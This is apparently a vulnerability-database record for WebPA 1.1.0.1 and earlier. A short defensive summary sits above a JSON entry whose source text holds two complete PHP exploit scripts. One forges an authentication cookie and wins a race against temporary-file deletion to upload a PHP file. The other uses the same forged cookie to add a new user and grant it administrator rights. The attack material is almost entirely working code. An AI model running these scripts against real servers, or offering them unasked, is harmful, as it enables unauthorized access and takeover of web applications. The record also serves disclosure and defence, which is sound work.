Description
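No description provided by source. Summary from the record below: the advisory (dun, 2012-08-23) covers WebPA <= 1.1.0.1 and contains two proof-of-concept scripts, labelled "Arbitrary File Upload" and "Arbitrary Add Admin". Both send an AUTH_COOKIE built entirely on the client, a base64-encoded string of two timestamps and a serialized array carrying user_id and admin. The advisory's own comment calls this an authentication bypass, which suggests the application accepts the cookie without a server-side integrity check. The upload PoC targets tmp/readfile.php and depends on a temporary file being reachable under the web root before it is deleted. The admin PoC goes through the CSV import at admin/load/simple.php and then admin/edit/index.php. The record lists no CVE, and its CVSS value of 0.0 / NONE means the entry was never scored, not that the severity is low. Defenders running an affected version should look for requests to these paths and unexpected .php files under tmp/. They should also treat any session state held in a client cookie as untrusted unless it is signed and verified on the server.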
{"lastseen": "2017-11-19T15:23:15", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "href": "https://www.seebug.org/vuldb/ssvid-74620", "references": [], "enchantments_done": [], "id": "SSV:74620", "title": "webpa <= 1.1.0.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ "Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP"` "YmmMMMM"" MMM YM\r\n\r\n [ Discovered by dun \\ posdub[at]gmail.com ]\r\n [ 2012-08-23 ]\r\n ##################################################\r\n # [ WebPA <= 1.1.0.1 ] Multiple Vulnerabilities #\r\n ##################################################\r\n #\r\n # Script: "WebPA is an open source online peer assessment tool that enables\r\n # every team member to recognise individual contributions to group work."\r\n #\r\n # Vendor: http://www.webpaproject.com/\r\n # Download: http://sourceforge.net/projects/webpa/files/webpa/\r\n # Exploits were tested on:\r\n # Windows (Apache 2.2.17 + php 5.2.17)\r\n # Linux Centos (Apache 2.2.3 (CentOS) + php 5.2.17)\r\n #\r\n ##################################################\r\n # [ Arbitrary File Upload ]\r\n # PoC exploit Code:\r\n <?php\r\n error_reporting(0);\r\n set_time_limit(0);\r\n ini_set("default_socket_timeout", 5);\r\n\r\n function http_send($host, $port, $headers) {\r\n $fp = fsockopen($host, $port);\r\n if (!$fp) die('Connection -> fail');\r\n fputs($fp, $headers);\r\n return $fp;\r\n }\r\n\r\n function http_recv($fp) {\r\n $ret="";\r\n while (!feof($fp))\r\n $ret.= fgets($fp, 1024);\r\n fclose($fp);\r\n return $ret;\r\n }\r\n\r\n 
print "\\n# WebPA v1.1.0.1 Arbitrary File Upload #\\n";\r\n print "# Discovered by dun \\ posdub[at]gmail.com #\\n\\n";\r\n if ($argc < 3) {\r\n print "Usage: php $argv[0] <host> <path>\\n";\r\n print "Example: php $argv[0] localhost /WebPA/\\n";\r\n die();\r\n }\r\n\r\n $host = $argv[1];\r\n $path = $argv[2];\r\n $tmp = 'tmp/';\r\n $temp_prefix='temp_';\r\n $up_file='phpinfo.php';\r\n $i=0;\r\n // preparing cookie for authentication bypass\r\n $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array('user_id'=> '1', 'admin'=> '1')));\r\n // preparing POST data to perform the maximum delay before deleting temporary php file\r\n $payload = "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"uploadedfile\\"; filename=\\"%s\\"\\r\\n";\r\n $payload .= "Content-Type: text/plain\\r\\n\\r\\n";\r\n $payload .= "<?php fwrite(fopen('%s','w'),'<?php phpinfo(); ?>'); ?>!".str_repeat("A",40)."\\r\\n";\r\n // making max lag, before unlink\r\n $payload .= str_repeat(str_repeat("A!",1)."!".str_repeat("A!",4)."\\r\\n",1000)."\\r\\n"; \r\n $payload .= "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"rdoFileContentType\\"\\r\\n\\r\\n";\r\n $payload .= "2\\r\\n";\r\n $payload .= "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"rdoFileSeperator\\"\\r\\n\\r\\n";\r\n $payload .= "!\\r\\n";\r\n $payload .= "-----------------------------187161971819895--\\r\\n";\r\n $headers = "POST {$path}{$tmp}readfile.php HTTP/1.1\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n";\r\n $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\\r\\n";\r\n $headers .= "Content-Length: ".strlen($payload)."\\r\\n\\r\\n";\r\n $headers .= sprintf($payload, $temp_prefix.$up_file, 
$up_file);\r\n fclose(http_send($host, 80, $headers));\r\n $headers = "GET {$path}{$tmp}%s HTTP/1.0\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n\\r\\n";\r\n\r\n while(++$i<1000) {\r\n $res=http_recv(http_send($host, 80, sprintf($headers, $temp_prefix.$up_file)));\r\n if(!preg_match('/404 Not Found/',$res)) {\r\n $res=http_recv(http_send($host, 80, sprintf($headers, $up_file)));\r\n if(preg_match('/200 OK/',$res))\r\n print "Success!\\n\\nUploaded file: http://{$host}{$path}{$tmp}{$up_file}\\n";\r\n break;\r\n }\r\n }\r\n if($i==1000) print "Failed.\\n";\r\n ?>\r\n #\r\n ##################################################\r\n # [ Arbitrary Add Admin ]\r\n # PoC exploit Code:\r\n <?php\r\n error_reporting(0);\r\n set_time_limit(0);\r\n ini_set("default_socket_timeout", 5);\r\n\r\n function http_send($host, $port, $headers) {\r\n $fp = fsockopen($host, $port);\r\n if (!$fp) die('Connection -> fail');\r\n fputs($fp, $headers);\r\n return $fp;\r\n }\r\n\r\n function http_recv($fp) {\r\n $ret="";\r\n while (!feof($fp))\r\n $ret.= fgets($fp, 1024);\r\n fclose($fp);\r\n return $ret;\r\n }\r\n\r\n print "\\n# WebPA v1.1.0.1 Arbitrary Add Admin Exploit #\\n";\r\n print "# Discovered by dun \\ posdub[at]gmail.com #\\n\\n";\r\n if ($argc < 5) {\r\n print "Usage: php $argv[0] <host> <path> username password\\n";\r\n print "Example: php $argv[0] localhost /WebPA/ foo bar\\n";\r\n die();\r\n }\r\n\r\n $host = $argv[1];\r\n $path = $argv[2];\r\n $newuser = $argv[3];\r\n $newpass = $argv[4];\r\n $cookie = base64_encode((time()*2).'|'.(time()*2).'|'.serialize(array( 'user_id'=> '1', 'admin'=> '1' )));\r\n print "Adding a new user [ {$newuser} : {$newpass} ]\\n";\r\n $payload = "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"uploadedfile\\"; filename=\\"user.csv\\"\\r\\n";\r\n $payload .= "Content-Type: text/csv\\r\\n\\r\\n";\r\n $payload .= 
"institutional_reference,forename,lastname,email,username,module_code,department_id,course_id,password\\r\\n";\r\n $payload .= "1,2,3,4,{$newuser},6,7,8,{$newpass}\\r\\n\\r\\n";\r\n $payload .= "-----------------------------187161971819895\\r\\n";\r\n $payload .= "Content-Disposition: form-data; name=\\"rdoFileContentType\\"\\r\\n\\r\\n";\r\n $payload .= "2\\r\\n";\r\n $payload .= "-----------------------------187161971819895--\\r\\n";\r\n $headers = "POST {$path}admin/load/simple.php HTTP/1.1\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n";\r\n $headers .= "Content-Type: multipart/form-data; boundary=---------------------------187161971819895\\r\\n";\r\n $headers .= "Content-Length: ".strlen($payload)."\\r\\n\\r\\n";\r\n $headers .= ($payload);\r\n fclose(http_send($host, 80, $headers));\r\n sleep(2);\r\n print "Granting admin privileges for user [ {$newuser} ]\\n";\r\n $headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n\\r\\n";\r\n preg_match_all('/php\\?u=(\\d+)/',http_recv(http_send($host, 80, $headers)) , $matches);\r\n if(!is_numeric(max($matches[1]))) die('Failed.');\r\n sleep(2);\r\n $payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=".urlencode('Save Changes');\r\n $headers = "POST {$path}admin/edit/index.php?u=".max($matches[1])." 
HTTP/1.0\\r\\n";\r\n $headers .= "Host: {$host}\\r\\n";\r\n $headers .= "Connection: close\\r\\n";\r\n $headers .= "Cookie: AUTH_COOKIE={$cookie}\\r\\n";\r\n $headers .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\r\n $headers .= "Content-Length: ".strlen($payload)."\\r\\n\\r\\n";\r\n $headers .= ($payload);\r\n fclose(http_send($host, 80, $headers));\r\n print "Success!\\n\\n";\r\n print "http://{$host}{$path}login.php\\n";\r\n print "user: {$newuser}\\n";\r\n print "pass: {$newpass}\\n";\r\n ?>\r\n #\r\n ### [ dun / 2012 ] ###############################\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74620", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645468205, "score": 1659785532, "epss": 1678850553}}
{}